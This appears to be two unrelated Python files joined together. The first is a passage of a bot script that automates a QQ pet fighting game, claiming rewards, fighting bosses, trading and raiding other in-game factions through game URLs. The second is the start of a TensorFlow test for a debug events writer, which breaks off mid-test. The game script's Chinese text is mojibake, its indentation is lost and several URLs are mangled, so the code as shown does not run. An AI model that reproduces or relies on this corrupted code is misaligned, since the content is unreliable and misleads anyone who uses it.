log.info("ๅธฎๆดพ่ฟๅพๅ๏ผๅฒๅฑฟ" + str(i + 1) + "-" + str(ii + 1) + "้ขๅฅ" + msg)
if str(islandAwardStatus) == str(1):
j = requestURL(yuanzhengjundaoyulingjinag % {"island_id": str(i)})
msg = j.get("msg")
log.info("ๅธฎๆดพ่ฟๅพๅ๏ผๅฒๅฑฟ" + str(i + 1) + "-" + "4้ขๅฅ " + msg)
def liumenhuiwu(log):
"""
ๅ
ญ้จไผๆญฆ
:param log:
:return:
"""
huiwuzhuweichaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sectmelee&op=showcheer"
huiwuzhuwei = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sectmelee§=1003&op=cheer"
huiwushilian = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sectmelee&op=dotraining"
huiwulingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sectmelee&op=drawreward"
# todo ๅ ไธชๅคๆญ๏ผ็ญ็บงๅฐไบ40ไธๆง่กๆฌกๅ่ฝ
# ๅฉๅจ ๅจไธๆฉ6็น~ๅจไบๆฉ6็น
j = requestURL(huiwuzhuweichaxun) # ้ป่ฎคๅฉๅจไธๅธฎ
cheer_sect = j.get("cheer_sect")
if (dayOfWeek == 1 and hour >= 6) or (dayOfWeek == 5 and hour < 6) or dayOfWeek in [2, 3, 4] or str(
cheer_sect).startswith("0"):
j = requestURL(huiwuzhuwei)
msg = j.get("msg")
if not str(msg).startswith("ๆฌๅจๅทฒไธบ้จๆดพๅฉๅจ"):
log.info("ๅ
ญ้จไผๆญฆ-ๅฉๅจ๏ผ" + msg)
if dayOfWeek in [1, 6, 7]:
j = requestURL(huiwulingjiang)
msg = j.get("msg")
log.info("ไผๆญฆ-้ขๅฅ๏ผ" + msg)
# ไผๆญฆ่ฏ็ผ
# todo ๅคๆญ่ฏ็ผไนฆๅคไธๅค๏ผไธๅค่ชๅจๆข1ไธช
# ๆๆ
for i in range(20):
j = requestURL(huiwushilian)
msg = j.get("msg")
log.info("ๅ
ญ้จไผๆญฆ-่ฏ็ผ๏ผ" + msg)
if str(msg).startswith("ไฝ ๅทฒ่พพไปๆฅๆๆไธ้") or str(msg).startswith("ๅฝๅๆถๆฎตไธ่ฝ่ฟ่ก่ฏฅๆไฝ"):
break
def huiliu(log, qqnum="-1"):
"""
ๅๆตๅฅฝๅๅฌๅ
:param log:
:param qqnum: ไธๅกซ้ป่ฎคไธบ-1๏ผ้ๆบๅฌๅค
:return:
"""
huiliuchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=callback&subtype=3"
huiliulibao1 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=callback&subtype=6&gift=2"
huiliulibao2 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=callback&subtype=6&gift=3"
huiliuzhaohuan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=callback&subtype=4&opuin=%(opuin)s"
j = requestURL(huiliuchaxun)
msg = j.get("msg")
# if str(msg).startswith("ๅพๆฑๆญ๏ผ็ณป็ป็นๅฟ"):
# return
daycallnum = j.get("daycallnum")
canbecall = j.get("canbecall")
bind = j.get("bind")
if len(bind) > 0:
j = requestURL(huiliulibao1)
msg = j.get("msg")
log.info("ๅๆต-็ญๅฟๅฉไบบ็คผๅ
๏ผ" + msg)
j = requestURL(huiliulibao2)
msg = j.get("msg")
log.info("ๅๆต-่ฑชๆ
ๅฟซๆ็คผๅ
๏ผ" + msg)
times = 3 - int(daycallnum)
if int(times) == 0:
pass
elif len(canbecall) > 0:
if qqnum == "-1":
qqnum = canbecall[0].get("uin")
# ๅผๅงๅฌๅ
for i in range(times):
j = requestURL(huiliuzhaohuan % {"opuin": str(qqnum)})
msg = j.get("msg")
log.info("ๅๆตๅฌๅ๏ผ" + msg)
else:
pass
# bossID
# 2-ไนๆๆไธป 3-ไนๆๅธ
ๅธ
4-ไนๆๅงๅ
ฌ 5-ไนๆๆ็ๅงๅง 6-ไนๆๆบๅคงไพ 7-ไนๆ่่ 9-ไนๆๅๅ
# 10-็พ้ญ็ 11-ๆๆๅฆนๅฆน 12-ไฟ็ด็ 13-ๅคง่ฒ้ญ 14-้ฉฌๅคงๅธ 15-ๅๅงๅจ 16-ไนๆ็จ็ฎก 17-ๅฑฑ่ดผ
# 18-ๅผบ็ 19-้ช็ฅ็
ๅฅ 31-ๅฎๅฐ็จๅ
ณๅคงไพ ๏ผๅฐ็๏ผ 32-ๅฎๅฐๆฑไปๅคงไพ ๏ผๅฐ็๏ผ 33-้ๆฏ้น
็ 150-่้้
# 151-ๆฐๆๅฐ็ๅญ 152-ๆพๅฐไธ 153-็ๅฃ 154-็พๅซๅ
ฝ 155-ไธ็ฏๅคงๅธ 156-้ป่ฏๅธ
def tiaozhanboss(log, qqnum):
"""
ๆๆboss
:param log:
:param qqnum:
:return:
"""
chakanhaoyou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=view&kind=1&sub=1&selfuin=%(selfuin)s"
zhandou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fight&puin=%(puin)s"
ledoujiluchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=view&kind=2&sub=1&selfuin=%(selfuin)s"
chakanbangyou = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=viewmember"
zhandoubangpai = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fight&uin=%(uin)s"
chakanjiebaixialv = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&sid=&channel=0&g_ut=1&cmd=viewxialv"
zhandoujiebaixialvboss = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&sid=&channel=0&g_ut=1&cmd=fight&B_UID=%(B_UID)s"
# ่ทๅๅฅฝๅๅ่กจ
j = requestURL(chakanhaoyou % {"selfuin": str(qqnum)})
info = j.get("info")
for i in range(10):
enable = info[i].get("enable")
uin = info[i].get("uin")
if str(enable).startswith("1") and int(uin) < 10000:
requestURL(zhandou % {"puin": str(uin)}) # ่ฟๅไฟกๆฏ้่ฒไผผๆฒกๆ่ฎฐๅฝ๏ผๅปๆๆ่ฎฐๅฝ้ๆพ็ฌฌไธๆกไฟกๆฏไฝไธบ็ปๆ
j = requestURL(ledoujiluchaxun % {"selfuin": str(qqnum)})
ledoujilu = j.get("info")
if len(ledoujilu) > 0:
desc = ledoujilu[0].get("desc")
log.info("ไนๆ-ๆๆboss๏ผ" + desc)
# ๅธฎๆดพboss todo ๅคๆญๆๆฒกๆๅธฎๆดพ
j = requestURL(chakanbangyou)
msg = j.get("msg")
if str(msg).startswith("ๅพๆฑๆญ"):
pass
else:
level = j.get("level")
bosslist = j.get("list")
for i in range(1, int(level) + 1):
fight = bosslist[i].get("fight")
if str(fight).startswith("1"):
uin = bosslist[i].get("uin")
requestURL(zhandoubangpai % {"uin": str(uin)})
j = requestURL(ledoujiluchaxun % {"selfuin": str(qqnum)})
info = j.get("info")
if len(info) > 0:
desc = info[0].get("desc")
log.info("ไนๆ-ๆๆboss๏ผ" + desc)
# ็ปๆboss,ไพ ไพฃboss
response = req.get(chakanjiebaixialv)
html = response.content.decode("utf-8")
# pattern = re.compile('B_UID=[1-9]\d*>ไนๆ')
pattern = re.compile('B_UID=[1-9]\d*&page=&type=10">ไนๆ')
bossList = pattern.findall(html)
bossList = list(set(bossList))
newlist = []
for i in bossList:
id = str(i).replace("B_UID=", "").replace("&page=&type=10\">ไนๆ", "")
if int(id) < 10000:
newlist.append(id)
if len(newlist) > 0:
for i in newlist:
response = req.get(zhandoujiebaixialvboss % {"B_UID": str(i)})
html = response.content.decode("utf-8")
if "ไฝฟ็จ่งๅ" in str(html):
continue
j = requestURL(ledoujiluchaxun % {"selfuin": str(qqnum)})
info = j.get("info")
if len(info) > 0:
desc = info[0].get("desc")
log.info("ไนๆ-ๆๆboss๏ผ" + desc)
def shengri(log):
"""
็ๆฅ
:param log:
:return:
"""
shengrichaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=birthday"
shengrilingjiang1 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=birthday&op=getfreepresent"
shengrilingjiang2 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=birthday&op=getwishespresent"
shengrishuaxin = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=birthday&op=getrandomfriends"
shengriyouhaodulibao = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=birthday&op=getwishdegreepresent"
shengrifasongzhufu = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=birthday&op=sendwishes&receiver=%(receiver)s"
# 1.็ๆฅ็ฅ็ฆ todo ๅคๆญ็ๆฅ้ขๅฅ้ข่ฟๆฒก
j = requestURL(shengrichaxun) # ๆฅ่ฏขๅจไธๅจ็ๆฅๅจ
in_event = j.get("in_event")
received_wishes_num = j.get("received_wishes_num") # ๅฝๅๆถๅฐ็็ฅ็ฆๆฐ
wishes_required = j.get("wishes_required") # ็ๆฅ้ขๅฅๆ้็ฅ็ฆๆฐ
wish_degree = j.get("wish_degree") # ๅฝๅๅๅฅฝๅบฆ
wish_degree_required = j.get("wish_degree_required") # ้ขๅฅๆ้ๅๅฅฝๅบฆ
num = int(wish_degree_required) - int(wish_degree)
# ็ๆฅๆ้ด้ขๅฅ
if str(in_event).startswith("1"):
j = requestURL(shengrilingjiang1)
msg = j.get("msg")
log.info("็ๆฅ-ไธๅฑๅคง็คผ๏ผ" + msg)
if int(received_wishes_num) >= int(wishes_required): # ็ๆฅ็็ฅ็ฆ็คผๅ
๏ผ็ฌฆๆ็ณ+ๅนธ่ฟ็ณ+้ป้ๅท่ฝด๏ผ
j = requestURL(shengrilingjiang2)
msg = j.get("msg")
log.info("็ๆฅ-็ฅ็ฆๅคง็คผ๏ผ" + msg)
# ๆฅๅธธๅฅฝๅ็ๆฅ็ฅ็ฆ
newlist = []
for i in range(10):
j = requestURL(shengrishuaxin) # ๅทๆฐๅ่กจ
friends = j.get("friends")
for friend in friends:
can_send_wishes = friend.get("can_send_wishes")
if str(can_send_wishes).startswith("1"):
newlist.append(friend.get("uin"))
wishlist = list(set(newlist))
for qqnum in wishlist:
# ้็ฅ็ฆ
if num == 0:
j = requestURL(shengriyouhaodulibao)
msg = j.get("msg")
log.info("็ๆฅ-ๅๅฅฝๅบฆ็คผๅ
๏ผ" + msg)
num = wish_degree_required
else:
j = requestURL(shengrifasongzhufu % {"receiver": str(qqnum)})
msg = j.get("msg")
log.info("็ๆฅ-็ฅ็ฆ๏ผ" + msg)
if str(msg).startswith("ๆๅๅ้็ฅ็ฆ"):
num = num - 1
def meirijiangli(log):
"""
ๆฏๆฅๅฅๅฑ
:param log:
:return:
"""
meirijianglichakan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=dailygift"
meirijianglilingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=dailygift&op=draw&key=%(key)s"
j = requestURL(meirijianglichakan)
meridian = j.get("meridian") # ไผ ๅ็ฌฆ็คผๅ
login = j.get("login") # ๆฏๆฅ็คผๅ
daren = j.get("daren") # ่พพไบบ็คผๅ
wuzitianshu = j.get("wuzitianshu") # ๆ ๅญๅคฉไนฆ็คผๅ
for item in [meridian, login, daren, wuzitianshu]:
if str(item.get("status")).startswith("0"):
j = requestURL(meirijianglilingjiang % {"key": str(item.get("key"))})
msg = j.get("msg")
log.info("ๆฏๆฅๅฅๅฑ:" + msg)
def doudouyueka(username, log): # todo html้กต้ข่งฃๆ
"""
ๆ่ฑๆๅก้ขๅฅ
:param username:
:param log:
:return:
"""
yuakachaxun = "https://dld.qzapp.z.qq.com/qpet/cgi-bin/phonepk?zapp_uin=&B_UID=0&sid=&channel=0&g_ut=1&cmd=monthcard"
yuakalingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=use&id=3645&selfuin=%(selfuin)s"
response = req.get(yuakachaxun)
html = response.content.decode("utf-8")
if (str(html).find("่ฟๆชๅผ้ๆ่ฑๆๅก")) == -1:
j = requestURL(yuakalingjiang % {"selfuin": str(username)})
msg = j.get("msg")
log.info("ๆ่ฑๆๅก๏ผ" + msg)
# todo ๅพฎ็ซฏ
def yaoqing(log):
"""
้่ฏท
:param log:
:return:
"""
yaoqingchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sundyact&subtype=4"
yaoqingfenxiang1 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sundyact&subtype=6&inviteNum=5"
yaoqingfenxiang2 = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sundyact&subtype=6&inviteeKind=1&inviteNum=1"
yaoqingchoujiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=sundyact&subtype=5"
j = requestURL(yaoqingchaxun)
inviteNum = j.get("inviteNum")
inviteQQGroupNum = j.get("inviteQQGroupNum")
if int(inviteNum) < 5:
j = requestURL(yaoqingfenxiang1)
# msg = j.get("msg")
# log.info("้่ฏท-ๅไบซ๏ผ" + msg)
if int(inviteQQGroupNum) < 1:
j = requestURL(yaoqingfenxiang2)
# msg = j.get("msg")
# log.info("้่ฏท-ๅไบซ๏ผ" + msg)
for i in range(2):
j = requestURL(yaoqingchoujiang)
msg = j.get("msg")
if not str(msg).startswith("ไปๅคฉๅทฒ็ปๆฝ่ฟ2ๆฌกๅฅไบ"):
log.info("้่ฏท-ๆฝๅฅ๏ผ" + msg)
def liwu(log):
"""
ๅ
่ดน็คผ็ฉ๏ผไผๅ
ๅ่ต ๏ผ
:param log:
:return:
"""
liwuchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=exchangegifts&op=msg"
liwushouqu = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=exchangegifts&op=receive&id=%(id)s"
liwuhuizeng = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=exchangegifts&op=sendback&recipient=%(recipient)s"
liwuzengsong = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=exchangegifts&op=reply&id=%(id)s"
j = requestURL(liwuchaxun)
notifications = j.get("notifications")
giftin = [] # ๅพ
ๆถๅ
giftout = [] # ๅพ
่ต ้
for item in notifications:
if str(item.get("type")).startswith("1"):
giftin.append(item)
else:
giftout.append(item)
for item in giftin:
j = requestURL(liwushouqu % {"id": str(item.get("id"))}) # ๆถๅ
if j == None:
continue
# print(item.get("id"))
msg = j.get("msg")
if str(msg).startswith("ๆพไธๅฐๅฏนๅบ็ๆถๆฏ"):
continue
elif str(msg).startswith("ไปๆฅๆถๅๆฌกๆฐๅทฒ่พพไธ้"):
break
else:
log.info("็คผ็ฉ-ๆถๅ๏ผ" + msg)
j = requestURL(liwuhuizeng % {"recipient": str(item.get("uin"))}) # ไผๅ
ๅ่ต
msg = j.get("msg")
log.info("็คผ็ฉ-ๅ่ต ๏ผ" + msg)
for item in giftout:
j = requestURL(liwuzengsong % {"id": str(item.get("id"))}) # ่ต ้`
if j is None:
continue
msg = j.get("msg")
if str(msg).startswith("ไปๅคฉๅทฒ็ป็ปไป้่ฟ็คผ็ฉๅฆ"):
continue
elif str(msg).startswith("ไปๆฅ่ต ้ๆฌกๆฐๅทฒ่พพไธ้"):
break
else:
log.info("็คผ็ฉ-่ต ้๏ผ" + msg)
def shanghui(log):
"""
ๅไผ todo 1.่ชๅฎไนไบคๆๅ
ๆขๅ่กจ 2.็กฌๅธไฝไบๆไธชๆฐๅผๅไธๅ
ๆข
:param log:
:return:
"""
shanghuibaoku = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_corp&op=0&page=1"
shanghuilingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_corp&op=3&type=%(type)s&giftId=%(giftId)s"
shanghuijiaoyichaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_corp&op=1"
shanghuijiaoyi = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_corp&op=4&type=%(type)s&goods_id=%(goods_id)s"
shanghuiduihuanchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_corp&op=2"
shanghuiduihuan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=fac_corp&op=5&type_id=%(type_id)s"
# 1.้ขๅฅ
while True:
j = requestURL(shanghuibaoku)
giftInfo = j.get("giftInfo")
if type(giftInfo) == None:
continue
if len(giftInfo) == 0:
break
gifilist = []
for item in giftInfo:
gifttype = item.get("type")
giftid = item.get("giftId")
j = requestURL(shanghuilingjiang % {"type": str(gifttype), "giftId": giftid})
msg = j.get("msg")
if str("msg").startswith("ๅ
ฅๅธฎ24ๅฐๆถๆ่ฝ้ขๅๅไผ็คผๅ
"):
break
log.info("ๅไผ-้ขๅฅ๏ผ" + msg)
# 2.ไบคๆ
j = requestURL(shanghuijiaoyichaxun)
tradeInfo = j.get("tradeInfo")
for item in tradeInfo:
if str(item.get("isTraded")).startswith("0"):
if int(item.get("goodsId")) in [3374, 3487]:
gifttype = item.get("type")
goodsid = item.get("goodsId")
j = requestURL(shanghuijiaoyi % {"type": str(gifttype), "goods_id": goodsid})
msg = j.get("msg")
log.info("ๅไผ-ไบคๆ๏ผ" + msg)
# 3.ๅ
ๆข
j = requestURL(shanghuiduihuanchaxun)
coinNum = j.get("coinNum")
if int(coinNum) <= 1000:
#print("buduihuan")
pass
else:
exchangeInfo = j.get("exchangeInfo")
for item in exchangeInfo:
if str(item.get("isExchanged")).startswith("0") and int(coinNum) >= int(item.get("coinNum")):
if int(item.get("goodsId")) in []:
# ๅ
ๆข
j = requestURL(shanghuiduihuan % {"type_id": str(item.get("typeId"))})
msg = j.get("msg")
log.info("ๅไผ-ๅ
ๆข๏ผ" + msg)
coinNum = coinNum - item.get("coinNum")
else:
# print("ไธๅจไบคๆๅ่กจ")
pass
def bangpairenwu(username, log):
"""
ๅธฎๆดพไปปๅก
:param username:
:param log:
:return:
"""
global flag
bangpairenwuchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factiontask&sub=1"
bangpairenwuwancheng = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factiontask&taskid=%(taskid)s&sub=2"
j = requestURL(bangpairenwuchaxun)
tasklist = j.get("array")
tasklisttodo = []
tasklistdone = []
for task in tasklist:
if str(task.get("state")).startswith("0"):
tasklisttodo.append(task)
elif str(task.get("state")).startswith("1"):
tasklistdone.append(task)
else:
continue
for task in tasklisttodo:
if int(task.get("id")) == 1:
# ๅธฎๆดพไพๅฅ:ๅๅฎๆค็ฅไปปๆไพๅฅ1ไธช็ฉๅใ(ไพๅฅ่ฟ้ญไธน)
gongfeng(log, 3089)
elif int(task.get("id")) == 8 or int(task.get("id")) == 9:
# ๅธฎๆดพไฟฎ็ผ:่ฟ่กไธ/ไธๆฌกๅธฎๆดพไฟฎ็ผ
a = 1 if int(task.get("id"))==8 else 3
for i in range(1, a+1):
flag = bangpaixiulian(log)
if flag:
continue
elif int(task.get("id")) == 10:
# ๆฅ็็ฟๆด:่ฟๅ
ฅ็ฟๆด็้ข๏ผๆฅ็ๆฌๅธฎๆดพ็ฟๆด่ฏฆๆ
kuangdongchakan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionmine"
requestURL(kuangdongchakan)
elif int(task.get("id")) == 11:
# ๆฅ็ๅธฎ่ดก:็นๅป่ดก็ฎๅบฆๆฅ่ฏข๏ผๆฅ็่ชๅทฑๅจๅธฎๆดพไธญ็ๆๅ
gongxianchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factiontask&sub=3"
requestURL(gongxianchaxun)
elif int(task.get("id")) == 12 or int(task.get("id")) == 14:
# ๆฅ็ๅธฎๆ:่ฟๅ
ฅๅธฎๆดพๆไบ็้ข๏ผๆฅ็ๆฌๅธฎ่ตๅบๆๅตใ/่ฟๅ
ฅๅธฎๆดพๆไบ็้ข๏ผๆฅ็ๆฌๅธฎ่ตๅบ็ๆปๅ ๅๆๅต
bangzhanchakan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=facwarrsp&id=1"
requestURL(bangzhanchakan)
elif int(task.get("id")) == 13:
# ็ฒฎ่ๆ ๅคบ:่ฟๅ
ฅ็ฒฎ่ๆ ๅคบๆ็้ข๏ผๆฅ็ๆฌๅธฎๆๆ็ถๅตใ
liangcaochakan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=forage_war"
requestURL(liangcaochakan)
elif int(task.get("id")) == 15:
# ๅ ้่ดก็ฎ:ไฝฟ็จ1ๆฌก่ดก็ฎ่ฏๆฐดใ
shiyongwupin(username, "3038", log)
elif int(task.get("id")) == 16:
# ๆฅ็่ฆ้ป:็นๅปๅธฎๆดพ่ฆ้ป๏ผๆฅ็ๅธฎๆดพๆ่ฟๅจๆใ
bangpaiyaowen = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factionstaff&page=1"
requestURL(bangpaiyaowen)
tasklistdone.append(task)
for task in tasklistdone:
j = requestURL(bangpairenwuwancheng % {"taskid": task.get("id")})
msg = j.get("msg")
log.info("ๅธฎๆดพ-ไปปๅก๏ผ" + msg)
def bangpaixiulian(log):
"""
ๅธฎๆดพๆ่ฝไฟฎ็ผ
:param log:
:return:
"""
bangpaixiulian = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factiontrain&type=2&id=%(id)s×=1"
bangpaijinengchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=factiontrain&type=1"
j = requestURL(bangpaijinengchaxun)
skilllist = j.get("array")
for skill in skilllist:
j = requestURL(bangpaixiulian % {"id": str(skill.get("id"))})
msg = j.get("msg")
if str(msg).startswith("ๆ่ฝ็ป้ชๅขๅ "):
# arr = j.get("array")
# index = int(list.index(skill))
# skill = arr[index]
log.info("ๅธฎๆดพ-ไฟฎ็ผ๏ผไฟฎ็ผ" + str(skill.get("name")) + "," + str(msg) + str(skill.get("cur_lvl_exp")))
return True
return False
def bangpaijitan(log):
"""
ๅธฎๆดพ็ฅญๅ todo ้ๅ
ณ้ขๅฅ
:param log:
:return:
"""
jitanchakan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=altar"
jitanzhuanpan = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=altar&op=spinwheel"
showtarget = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=altar&op=showspecialtargets"
rob = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=altar&id=%(id)s&op=rob"
steal = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=altar&id=%(id)s&op=steal"
jitanlingjiang = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=altar&op=drawreward"
j = requestURL(jitanchakan)
last_reward_points = j.get("last_reward_points")
if int(last_reward_points)>0:
j = requestURL(jitanlingjiang)
msg = j.get("msg")
log.info("็ฅญๅ-้ขๅฅ๏ผ" + msg)
while True:
j = requestURL(jitanchakan)
left_free_wheel_times = j.get("left_free_wheel_times")
if int(left_free_wheel_times) == 0:
break
print("็ฅญๅๅฉไฝๅ
่ดนๆฌกๆฐ๏ผ" + left_free_wheel_times)
j = requestURL(jitanzhuanpan)
action_id = j.get("action_id")
if str(action_id) in ["1000", "1001", "1002", "1005", "1006", "1007", "1008"]:
msg = j.get("msg")
log.info("ๅธฎๆดพ็ฅญๅ-่ฝฌ็๏ผ" + str(msg))
elif str(action_id) == "1003":
j = requestURL(showtarget)
randomfac = j.get("random_faction")
enemieslist = j.get("enemies")
revengelist = j.get("revenge_targets")
steallist = enemieslist + revengelist
steallist.append(randomfac)
# ๅฎฃๆ>ๅคไป>้ๆบ
for enemy in steallist:
j = requestURL(rob % {"id": str(enemy.get("id"))})
msg = j.get("msg")
if str(msg).startswith("่ฏฅๅธฎๆดพๆญฃๅคไบไฟๆคไธญ"):
continue
else:
log.info("ๅธฎๆดพ็ฅญๅ-ๆ ๅคบ๏ผ" + str(msg))
break
elif str(action_id) == "1004":
j = requestURL(showtarget)
randomfac = j.get("random_faction")
enemieslist = j.get("enemies")
revengelist = j.get("revenge_targets")
steallist = enemieslist + revengelist
steallist.append(randomfac)
# ๅฎฃๆ>ๅคไป>้ๆบ
for enemy in steallist:
j = requestURL(steal % {"id": str(enemy.get("id"))})
msg = j.get("msg")
if str(msg).startswith("่ฏฅๅธฎๆดพๆญฃๅคไบไฟๆคไธญ"):
continue
else:
log.info("ๅธฎๆดพ็ฅญๅ-ๅทๅ๏ผ" + str(msg))
break
else:
continue
def jingjichang(log):
"""
็ซๆๅบ todo 1.ๆๆ 2.่ตๅญฃๆซ้ขๅฅ 3.่ชๅจๅ
ๆข 4.ๆ่กๆฆๅฅๅฑ
:param log:
:return:
"""
jingjichangchaxun = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=arena"
jingjichaangmeirijiangli = "https://fight.pet.qq.com/cgi-bin/petpk?cmd=arena&op=dailyreward"
j = requestURL(jingjichangchaxun)
rest_time = j.get("rest_time")
left_free_times = j.get("left_free_times")
if int(rest_time) > 0:
#ๆๆ
pass
#้ขๅฅ
j = requestURL(jingjichangchaxun)
can_draw_daily_reward = j.get("can_draw_daily_reward")
if str(can_draw_daily_reward) == "1":
j = requestURL(jingjichaangmeirijiangli)
msg = j.get("msg")
log.info("็ซๆๅบ-้ขๅฅ๏ผ" + msg)
def sendmsg():
pass
def parser(response):
"""
่งฃๆ่ฟๅ็jsonๅญ็ฌฆไธฒ
:param response:
:return:
"""
html = response.content.decode("gbk", 'ignore')
html = html.replace("\\n","").replace("\\","")
j = json.loads(html)
return j
def requestURL(url):
"""
PC็ซฏ่ฏทๆฑๆฅๅฃ๏ผ่ฟๅjson
:param url:
:return:
"""
for times in range(10):
response = req.get(url)
retjson = parser(response)
# -5:็ปๅฝๅคฑๆ -2:็ณป็ป็นๅฟ 0:ๆญฃๅธธ
if str(retjson.get("result")).startswith("-5"):
print("็ป้ๆ ก้ชๅคฑ่ดฅ") # ๆช็ปๅฝ๏ผ้ๅบ
sys.exit()
elif str(retjson.get("result")).startswith("-2"):
# ่ฏทๆฑ่ฟๅฟซไบ
sleep(1)
continue
else:
return retjson
|
debug_events_writer_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the debug events writer Python class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import json as json_lib
import os
import threading
import time
from tensorflow.core.protobuf import debug_event_pb2
from tensorflow.python.debug.lib import debug_events_reader
from tensorflow.python.debug.lib import debug_events_writer
from tensorflow.python.debug.lib import dumping_callback_test_lib
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.platform import googletest
class DebugEventsWriterTest(dumping_callback_test_lib.DumpingCallbackTestBase):
def testMultiThreadedConstructorCallWorks(self):
def init_writer():
debug_events_writer.DebugEventsWriter(self.dump_root)
num_threads = 4
threads = []
for _ in range(num_threads):
thread = threading.Thread(target=init_writer)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
# Verify that there is only one debug event file of each type.
metadata_paths = glob.glob(os.path.join(self.dump_root, "*.metadata"))
self.assertEqual(len(metadata_paths), 1)
source_files_paths = glob.glob(
os.path.join(self.dump_root, "*.source_files"))
self.assertEqual(len(source_files_paths), 1)
stack_frames_paths = glob.glob(
os.path.join(self.dump_root, "*.stack_frames"))
self.assertEqual(len(stack_frames_paths), 1)
graphs_paths = glob.glob(os.path.join(self.dump_root, "*.graphs"))
self.assertEqual(len(graphs_paths), 1)
self._readAndCheckMetadataFile()
def testWriteSourceFilesAndStackFrames(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_protos = 10
for i in range(num_protos):
source_file = debug_event_pb2.SourceFile()
source_file.file_path = "/home/tf2user/main.py"
source_file.host_name = "machine.cluster"
source_file.lines.append("print(%d)" % i)
writer.WriteSourceFile(source_file)
stack_frame = debug_event_pb2.StackFrameWithId()
stack_frame.id = "stack_%d" % i
stack_frame.file_line_col.file_index = i * 10
writer.WriteStackFrameWithId(stack_frame)
writer.FlushNonExecutionFiles()
with debug_events_reader.DebugEventsReader(self.dump_root) as reader:
actuals = list(item.debug_event.source_file
for item in reader.source_files_iterator())
self.assertLen(actuals, num_protos)
for i in range(num_protos):
self.assertEqual(actuals[i].file_path, "/home/tf2user/main.py")
self.assertEqual(actuals[i].host_name, "machine.cluster")
self.assertEqual(actuals[i].lines, ["print(%d)" % i])
actuals = list(item.debug_event.stack_frame_with_id
for item in reader.stack_frames_iterator())
self.assertLen(actuals, num_protos)
for i in range(num_protos):
self.assertEqual(actuals[i].id, "stack_%d" % i)
self.assertEqual(actuals[i].file_line_col.file_index, i * 10)
def testWriteGraphOpCreationAndDebuggedGraphs(self):
writer = debug_events_writer.DebugEventsWriter(self.dump_root)
num_op_creations = 10
for i in range(num_op_creations):
graph_op_creation = debug_event_pb2.GraphOpCreation()
graph_op_creation.op_type = "Conv2D"
graph_op_creation.op_name = "Conv2D_%d" % i
writer.WriteGraphOpCreation(graph_op_creation)
debugged_graph = debug_event_pb2.DebuggedGraph()
debugged_graph.graph_id = "deadbeaf"
debugged_graph.graph_name = "MyGraph1"
writer.WriteDebuggedGraph(debugged_graph)
writer.FlushNonExecutionFiles()
reader = debug_events_reader.DebugEventsReader(self.dump_root)
actuals = list(item.debug_event for item in reader.graphs_iterator())
self.assertLen(actuals, num_op_creations + 1)
for i in range(num_op_creations):
self.assertEqual(actuals[i].graph_op_creation.op_type, "Conv2D")
